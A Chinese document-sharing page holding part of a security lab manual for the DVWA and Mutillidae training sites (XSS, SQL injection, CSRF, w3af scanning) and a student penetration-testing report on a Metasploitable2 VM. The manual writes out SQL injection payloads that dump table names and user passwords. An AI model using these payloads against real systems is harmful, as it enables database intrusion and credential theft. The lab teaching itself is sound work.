      11,點(diǎn)擊Payload切換到變量負(fù)載頁(yè),然后模仿下圖輸入一些負(fù)載項(xiàng)。其中一項(xiàng)包含有腳本內(nèi)容。

      12,點(diǎn)擊上圖右上角的Start attack按鈕,讓Burp自動(dòng)使用上一步定義的負(fù)載對(duì)服務(wù)器發(fā)起“攻擊”。待攻擊結(jié)束后,在如下界面中檢查結(jié)果。上面的列表是訪問服務(wù)器的概括,每一行是一次訪問。選擇第3行,確認(rèn)script內(nèi)容確實(shí)被“回顯”到瀏覽器。

      13,仿照第3步,關(guān)閉Proxy選項(xiàng)(設(shè)置為No proxy),本實(shí)驗(yàn)結(jié)束。

      試驗(yàn)4 理解SQL注入

      1,啟動(dòng)Meta虛擬機(jī)和Kali虛擬機(jī)(如果已經(jīng)啟動(dòng),則不需要重啟)。登陸到Meta虛擬機(jī),使用ifconfig命令觀察到它的IP地址。

      2,在Kali虛擬機(jī)中啟動(dòng)Firefox瀏覽器,通過類似如下網(wǎng)址訪問Meta中的DVWA網(wǎng)站。http://10.0.2.6/dvwa 3,使用admin/password登陸后,選擇Security,將Security level設(shè)置為low。4,選擇SQL Injection,在User ID表單中輸入1,點(diǎn)擊Submit。應(yīng)該看到類似如下輸出:

      5,在表單中輸入單引號(hào)’,并點(diǎn)擊Submit,應(yīng)該看到服務(wù)器端返回錯(cuò)誤。這說(shuō)明網(wǎng)站存在SQL注入風(fēng)險(xiǎn)。

      6,在表單中輸入單引號(hào)’ or 1=1--,并點(diǎn)擊Submit,應(yīng)該可以看到很多條數(shù)據(jù)庫(kù)記錄。7,在表單中輸入單引號(hào)’ union select NULL--,并點(diǎn)擊Submit,應(yīng)該可以看到如下錯(cuò)誤提示:

      8,在表單中輸入單引號(hào)’ union select NULL, NULL--,并點(diǎn)擊Submit,應(yīng)該可以看到類似如下輸出,據(jù)此可以推測(cè)出服務(wù)端的select語(yǔ)句選擇了兩列。

      9,輸入' UNION SELECT NULL, table_name from INFORMATION_SCHEMA.tables--,并提交,應(yīng)該可以成功列出數(shù)據(jù)庫(kù)中的所有表名。

      10,繼續(xù)執(zhí)行' UNION SELECT NULL, column_name from INFORMATION_SCHEMA.columns where table_name = 'users' – 可以列出users表中的所有列名

      11,執(zhí)行' UNION SELECT NULL, password from users--可以列出users表中所有用戶密碼字段的取值。

      12,點(diǎn)擊網(wǎng)頁(yè)右下角的View Source按鈕閱讀服務(wù)端的源代碼,理解漏洞的根源。

      試驗(yàn)5 理解CSRF 1,啟動(dòng)Meta虛擬機(jī)和Kali虛擬機(jī)(如果已經(jīng)啟動(dòng),則不需要重啟)。登陸到Meta虛擬機(jī),使用ifconfig命令觀察到它的IP地址。

      2,在Kali虛擬機(jī)中啟動(dòng)Firefox瀏覽器,通過類似如下網(wǎng)址訪問Meta中的Mutillidae網(wǎng)站。http://10.0.2.6/mutillidae 3,使用admin/adminpass登陸后,點(diǎn)擊網(wǎng)頁(yè)橫條上Toggle Security鏈接,將Security level設(shè)置為0(Hosed)。

      4,選擇OWASP Top 10 > A5 Cross Site Request Forgery(CSRF)> Add to your blog.5,在表單的編輯區(qū)域隨便輸入些內(nèi)容,然后點(diǎn)擊Save Blog Entry提交博客。提交成功后,網(wǎng)頁(yè)下面的博客列表中應(yīng)該新增了一項(xiàng)。

      6,在終端窗口執(zhí)行g(shù)edit啟動(dòng)文本編輯器,打開Home目錄下的trycsrf.html,將其中的服務(wù)器地址修改為Meta機(jī)器的IP地址(action=”http://...),然后保存。

      7,點(diǎn)擊桌面左側(cè)工具條上的Files 按鈕啟動(dòng)文件瀏覽器,找到Home目錄下的trycsrf.html文件,雙擊打開。

      8,待瀏覽器打開上述html后,將鼠標(biāo)在文字上面輕微移動(dòng)一下,這會(huì)觸發(fā)頁(yè)面上的mouse over事件,自動(dòng)提交表單。

      9,上面一步是模擬客戶在登陸重要網(wǎng)站后,收到釣魚郵件,點(diǎn)擊其中鏈接,該鏈接會(huì)向重要網(wǎng)站發(fā)出請(qǐng)求,瀏覽器在發(fā)送這個(gè)請(qǐng)求時(shí)會(huì)自動(dòng)帶上cookie信息。等待瀏覽器自動(dòng)做了一系列操作后,觀察網(wǎng)頁(yè)上的博客列表,會(huì)看到多了一條,這一條就是‘黑客’通過CSRF攻擊加入的。

      10,嘗試將第6步中的IP地址略作修改,比如將10.0.2.6修改為10.0.2.06,然后保存和重復(fù)上述步驟,那么雖然也會(huì)自動(dòng)提交產(chǎn)生新的blog,但是發(fā)表者卻是anonymous,而不是admin,這是為什么呢?

      試驗(yàn)6 使用w3af掃描網(wǎng)站的漏洞

      1,點(diǎn)擊桌面工具欄上的Apps按鈕擊圖標(biāo)啟動(dòng)w3af工具。,輸入w3af搜索,找到下圖所示的應(yīng)用后點(diǎn)

      2,參照下圖,在Scan config頁(yè)中,在左側(cè)選擇OWASP_TOP10,目標(biāo)區(qū)輸入Meta虛擬機(jī)的IP地址。

      3,點(diǎn)擊Start按鈕開始掃描。

      4,在Log頁(yè)面中可以看到掃描的過程。5,結(jié)合講解內(nèi)容理解掃描結(jié)果。

      第五篇:網(wǎng)絡(luò)信息安全 滲透測(cè)試

      網(wǎng)絡(luò)信息安全--課程結(jié)業(yè)報(bào)告

      重慶交通大學(xué)

      課程結(jié)業(yè)報(bào)告

      班 級(jí):

      學(xué) 號(hào):

      姓 名:

      實(shí)驗(yàn)項(xiàng)目名稱:

      實(shí)驗(yàn)項(xiàng)目性質(zhì):

      實(shí)驗(yàn)所屬課程:

      實(shí)驗(yàn)室(中心):

      指 導(dǎo) 教 師 :

      實(shí)驗(yàn)完成時(shí)間:

      滲透測(cè)試

      設(shè)計(jì)性

      網(wǎng)絡(luò)信息安全

      軟件實(shí)驗(yàn)室

      2016 年 6 月 30 日

      一、概述

      網(wǎng)絡(luò)滲透測(cè)試就是利用所有的手段進(jìn)行測(cè)試,發(fā)現(xiàn)和挖掘系統(tǒng)中存在的漏洞,然后撰寫滲透測(cè)試報(bào)告,將其提供給客戶;客戶根據(jù)滲透人員提供的滲透測(cè)試報(bào)告對(duì)系統(tǒng)存在漏洞和問題的地方進(jìn)行修復(fù)和修補(bǔ)。滲透測(cè)試是通過模擬惡意黑客的攻擊方法,來(lái)評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全的一種評(píng)估方法。滲透測(cè)試與其它評(píng)估方法不同,通常的評(píng)估方法是根據(jù)已知信息資源或其它被評(píng)估對(duì)象,去發(fā)現(xiàn)所有相關(guān)的安全問題。滲透測(cè)試是根據(jù)已知可利用的安全漏洞,去發(fā)現(xiàn)是否存在相應(yīng)的信息資源。

      應(yīng)網(wǎng)絡(luò)信息安全課程結(jié)課要求,于2016年5月至2016年7月期間,在MobaXterm和kail平臺(tái)進(jìn)行了活動(dòng)主機(jī)和活動(dòng)端口掃描以及漏洞掃描,最后匯總得到了該分析報(bào)告。

      二、實(shí)驗(yàn)?zāi)康?/p>

      ①熟悉kali平臺(tái)和MobaXterm; ②熟悉信息收集的基本方法和技巧;

      ③了解kali平臺(tái)下活動(dòng)主機(jī)和端口掃描的方法; ④了解漏洞掃描的過程;

      三、滲透測(cè)試范圍

      此次滲透測(cè)試的對(duì)象為:10.1.74.114---Metasploitable2 Linux。

      四、本次分析工具介紹

      本次測(cè)試主要用到了MobaXterm、Nmap、Nessus和kali.MobaXterm是遠(yuǎn)程計(jì)算的終極工具箱。本次在MobaXterm上運(yùn)行了10.1.74.111(用戶名和密碼是root:toor)和10.1.74.114(滲透對(duì)象,用戶名和密碼:msfadmin:msfadmin)。

      如果在虛擬機(jī)里運(yùn)行kali,首先需要安裝好虛擬機(jī),然后下載安裝好滲透環(huán)境kail,然后下載安裝滲透對(duì)象(Metasploitable2 Linux)。

      Kali Linux預(yù)裝了許多滲透測(cè)試軟件,包括nmap(端口掃描器)、Wireshark(數(shù)據(jù)

      包分析器)、John the Ripper(密碼破解器),以及Aircrack-ng(一套用于對(duì)無(wú)線局域網(wǎng)進(jìn)行滲透測(cè)試的軟件).本次測(cè)試嘗試了Metasploit,但技術(shù)不成熟,不知道哪里出錯(cuò),沒有成功。

      圖1運(yùn)行Metasploit結(jié)果圖

      圖2 運(yùn)行Metasploit結(jié)果圖

      圖3 運(yùn)行Metasploit結(jié)果圖3 在漏洞掃描時(shí),因?yàn)榻虒W(xué)網(wǎng)上說(shuō)Kali中內(nèi)置了OpenVAS的,所以打算用這個(gè)工具

      作為掃描工具的,可是在我使用的kali平臺(tái)里并沒有這個(gè)內(nèi)置的工具。

      圖4 沒有內(nèi)置OpenVAS的kali

      本次實(shí)驗(yàn)還是使用了nmap的圖形化掃描工具zenmap。Nmap是目前為止使用最廣的端口掃描工具之一,軟件提供一些非常實(shí)用的功能。比如通過tcp/ip來(lái)甄別操作系統(tǒng)類型、秘密掃描、動(dòng)態(tài)延遲和重發(fā)、平行掃描、通過并行的PING偵測(cè)下屬的主機(jī)、欺騙掃描、端口過濾探測(cè)、直接的RPC掃描、分布掃描、靈活的目標(biāo)選擇以及端口的描述。

      除了以上工具,本次還用了Nessus,這個(gè)工具是目前全世界最多人使用的系統(tǒng)漏洞掃描與分析軟件。

      五、實(shí)驗(yàn)主要內(nèi)容及原理

      1、信息收集—掃描活動(dòng)主機(jī)

      可以使用一些命令來(lái)進(jìn)行局域網(wǎng)內(nèi)的活動(dòng)主機(jī)的掃描。常用的命令有 fping、nping、netenum、netdiscover 等。

      本次滲透測(cè)試選用了netdiscover來(lái)獲取LAN 中活動(dòng)主機(jī)及其MAC。

      2、信息收集—掃描目標(biāo)主機(jī)活動(dòng)端口

      信息收集有兩種方式,一種是命令行方式,一種是圖形化界面方式。常用的命令是 namp,使用語(yǔ)法:nmap 參數(shù) 目標(biāo)主機(jī)IP 地址。圖形界面工具是zenmap。

      3、信息收集—掃描漏洞

      Nessus是使用比較多的系統(tǒng)漏洞掃描與分析軟件。

      六、實(shí)驗(yàn)過程簡(jiǎn)述

      1、信息收集-掃描活動(dòng)主機(jī)

      實(shí)驗(yàn)步驟:在MobaXterm下進(jìn)行命令行形式進(jìn)行活動(dòng)主機(jī)的掃描:

      fping:掃描指定范圍內(nèi)的活動(dòng)主機(jī)(fping-s-r 1-g 202.202.240.1 202.202.240.254);

      nping:對(duì)防火墻過濾ICMP或主機(jī)不對(duì)ICMP響應(yīng)的情況,則可不使用ICMP,直接定制TCP包發(fā)出運(yùn)行nping-c1--tcp-p 80--flags syn 202.202.240.6;

      netenum:速度超快的活動(dòng)主機(jī)掃描器(運(yùn)行netenum 202.202.240.0/24 10)(10代表超時(shí)時(shí)間,越長(zhǎng)越準(zhǔn)確)

      netdiscover:獲取LAN中活動(dòng)主機(jī)及其MAC等信息(運(yùn)行netdiscover即可); 也在虛擬機(jī)里進(jìn)行了netdiscover掃描。

      2、信息收集—掃描目標(biāo)主機(jī)活動(dòng)端口

      實(shí)驗(yàn)步驟:在MobaXterm中輸入下列的命令即可完成目標(biāo)主機(jī)活動(dòng)端口的掃描: TCP連接掃描: nmap-sT-p--PN 202.202.240.6 SYN 掃描: nmap-sS-p--PN 202.202.240.6 Xmas 掃描:nmap-sX-p--PN 202.202.240.6 Null 掃描:nmap-sN-p--PN 202.202.240.6

      3、信息收集—掃描漏洞

      實(shí)驗(yàn)步驟:Nessus是目前全世界最多人使用的系統(tǒng)漏洞掃描與分析軟件。以下為安裝及配置步驟:

      下載Nessus軟件進(jìn)行注冊(cè),選擇家庭版,注冊(cè)號(hào)將發(fā)送到郵箱 使用命令dpkg-i Nessus-6.3.7-debian6_amd64.deb 命令進(jìn)行安裝

      運(yùn)行命令 /opt/nessus/bin/nessus-fetch--register(你得到的注冊(cè)號(hào))進(jìn)行注冊(cè)及更新模塊

      運(yùn)行命令/opt/nessus/sbin/nessus-adduser添加用戶并設(shè)為管理員(需記住,后面登錄要使用)

      運(yùn)行命令/etc/init.d/nessusdsta啟動(dòng)nessus服務(wù)

      打開瀏覽器,輸入https://127.0.0.1:8834登錄Nessus即可(先定策略,再掃描)

      七、實(shí)驗(yàn)結(jié)果及分析

      1、信息收集-掃描活動(dòng)主機(jī)

      圖5使用fping掃描活動(dòng)主機(jī)結(jié)果1

      圖6使用fping掃描活動(dòng)主機(jī)結(jié)果2

      通過運(yùn)行fping-s-r 1-g 202.202.240.1 202.202.240.254來(lái)掃描IP地址從

      202.202.240.1 到202.202.240.254的活動(dòng)主機(jī),(-s)打印出最后的結(jié)果;(-r 1)重復(fù)次數(shù)為1,默認(rèn)情況下為3;(-g)生成目標(biāo)列表,指定目標(biāo)列表的起始和結(jié)束IP,此次起始IP為202.202.240.1,結(jié)束IP為202.202.240.254。共掃描254個(gè)目標(biāo),其中74個(gè)存活,176個(gè)不可達(dá),沒有不知的IP地址。

      圖7使用nping掃描活動(dòng)主機(jī)結(jié)果

      圖8使用netenum掃描結(jié)果

      使用來(lái)進(jìn)行netenum掃描,顯示的是202.202.240.0/24這個(gè)網(wǎng)段的活動(dòng)主機(jī),顯示的結(jié)果。

      圖9netdiscover掃描結(jié)果

      從上面的圖中可以看出,netdiscover會(huì)顯示出活動(dòng)主機(jī)的IP地址、MAC地址等信息。

      2、信息收集—掃描目標(biāo)主機(jī)活動(dòng)端口

      圖10 nmap掃描結(jié)果1

      圖11 nmap掃描結(jié)果2

      圖12 nmap掃描結(jié)果3

      圖13 nmap掃描結(jié)果4 上圖是使用nmap掃描目標(biāo)主機(jī)活動(dòng)端口的結(jié)果,本次實(shí)驗(yàn)是掃描202.202.240.6的活動(dòng)端口,從結(jié)果中可以看出使用TCP連接掃描和SYN掃描結(jié)果80端口是開啟的,Xmas和Null掃描運(yùn)行不出結(jié)果,可能是掃描的時(shí)間不夠,活動(dòng)端口掃描不是快速完成的。掃描結(jié)果會(huì)顯示活動(dòng)的端口號(hào)以及提供的服務(wù)。

      下面是在虛擬機(jī)的kali平臺(tái)里使用zenmap對(duì)10.1.74.114進(jìn)行端口掃描的結(jié)果。由于掃描結(jié)果太多,所以只對(duì)部分進(jìn)行了截圖分析。

      圖14zenmap掃描結(jié)果

      使用zenmap對(duì)活動(dòng)端口進(jìn)行掃描比使用命令行簡(jiǎn)單,得到的結(jié)果比輸入命令得到的結(jié)果更加詳細(xì)。

      3、信息收集—掃描漏洞

      圖15Nessus掃描漏洞結(jié)果1 從掃描結(jié)果看出10.1.74.111有3個(gè)高危漏洞,18個(gè)中危漏洞,5個(gè)低危漏洞。下圖為掃描10.1.74.111的部分具體漏洞圖。

      圖16Nessus掃描結(jié)果2

      八、心得體會(huì)

      通過本次網(wǎng)絡(luò)信息安全課程的學(xué)習(xí),對(duì)滲透過程有了一定的了解,其基本步驟可總結(jié)為首先進(jìn)行信息收集,可以收集的信息有活動(dòng)主機(jī)、端口等等,然后掃描主機(jī)的漏洞,并對(duì)漏洞加以利用,從而達(dá)到攻擊的目的。

      這次設(shè)計(jì)對(duì)各個(gè)模塊有了淺顯的認(rèn)識(shí),深入程度還有待提高。

      下載滲透測(cè)試總結(jié)(范文)word格式文檔
      下載滲透測(cè)試總結(jié)(范文).doc
      將本文檔下載到自己電腦,方便修改和收藏,請(qǐng)勿使用迅雷等下載。
      點(diǎn)此處下載文檔

      文檔為doc格式


      聲明:本文內(nèi)容由互聯(lián)網(wǎng)用戶自發(fā)貢獻(xiàn)自行上傳,本網(wǎng)站不擁有所有權(quán),未作人工編輯處理,也不承擔(dān)相關(guān)法律責(zé)任。如果您發(fā)現(xiàn)有涉嫌版權(quán)的內(nèi)容,歡迎發(fā)送郵件至:645879355@qq.com 進(jìn)行舉報(bào),并提供相關(guān)證據(jù),工作人員會(huì)在5個(gè)工作日內(nèi)聯(lián)系你,一經(jīng)查實(shí),本站將立刻刪除涉嫌侵權(quán)內(nèi)容。

      相關(guān)范文推薦

        商業(yè)銀行滲透測(cè)試解決方案(共5篇)

        商業(yè)銀行滲透測(cè)試解決方案 一、滲透測(cè)試背景 銀行是網(wǎng)絡(luò)信息技術(shù)應(yīng)用最密集、應(yīng)用水平最高的行業(yè)之一,基于計(jì)算機(jī)網(wǎng)絡(luò)的各類銀行信息系統(tǒng)已經(jīng)成為銀行產(chǎn)品的開發(fā)推廣、銀行業(yè)......

        安全滲透測(cè)試技術(shù)白皮書(精選五篇)

        安全滲透測(cè)試技術(shù)白皮書 2008年8 月 17 日 目錄 第1章 滲透測(cè)試服務(wù)概述 ................................................... 4 1.1 1.2 滲透測(cè)試概述 .......................

        滲透檢測(cè)總結(jié)

        滲透檢測(cè)(penetration testing,縮寫符號(hào)為PT) 海南LNG項(xiàng)目 檢測(cè)部位:底襯板、罐頂襯板 檢測(cè)頻率:底襯板角板、底襯板三層搭接處、罐頂襯板三層搭接處(ICW聯(lián)合體內(nèi)部要求) 原理:利用......

        德育滲透總結(jié)

        一年級(jí)語(yǔ)文德育滲透總結(jié) 在語(yǔ)文活動(dòng)中,如何滲透德育素質(zhì)培養(yǎng),并沒有一種固定的模式,重要的是我們本著“既教書又育人”的意識(shí)和“造就一代新人”的責(zé)任感,促使自己去發(fā)現(xiàn),去總結(jié)......

        2011德育滲透總結(jié)

        體育學(xué)科德育教學(xué)滲透總結(jié) 2012.1 對(duì)學(xué)生的思想品德教育是體育教學(xué)的重要任務(wù)。在體育課中加強(qiáng)德育既能培養(yǎng)學(xué)生良好的思想行為,又有助于提高體育教學(xué)質(zhì)量。由于德育在體育教......

        德育滲透總結(jié)

        班主任工作總結(jié)(2012-2013學(xué)年度第一學(xué)期)年級(jí):七年級(jí) 任教學(xué)科:地理 姓名:張紅梅班主任工作總結(jié) 在本學(xué)期的教學(xué)過程中,始終遵循“五育并舉,德育為首”的原則,做好德育工作。地 理......

        三都(答案學(xué)科教學(xué)滲透法制教育測(cè)試

        學(xué)科教學(xué)滲透法制教育測(cè)試 參考答案 一、填空題 1、省教育廳組織編寫的教師用書《法制教育與學(xué)科教學(xué)》(貴州人民出版社出版) 2、實(shí)施對(duì)象是全縣各類學(xué)校在校學(xué)生 3、實(shí)施主體......

        滲透測(cè)試服務(wù)-億時(shí)代網(wǎng)絡(luò)工作室

        滲透測(cè)試服務(wù)授權(quán)合同 本授權(quán)書于 [201X年X月X日] 由 四川億時(shí)代網(wǎng)絡(luò)科技有限公司 [YiSshiDdai] 和XXXX科技有限公司 [保密客戶] 訂立。 鑒于:[保密客戶] 向 [YSD] 提出申請(qǐng)......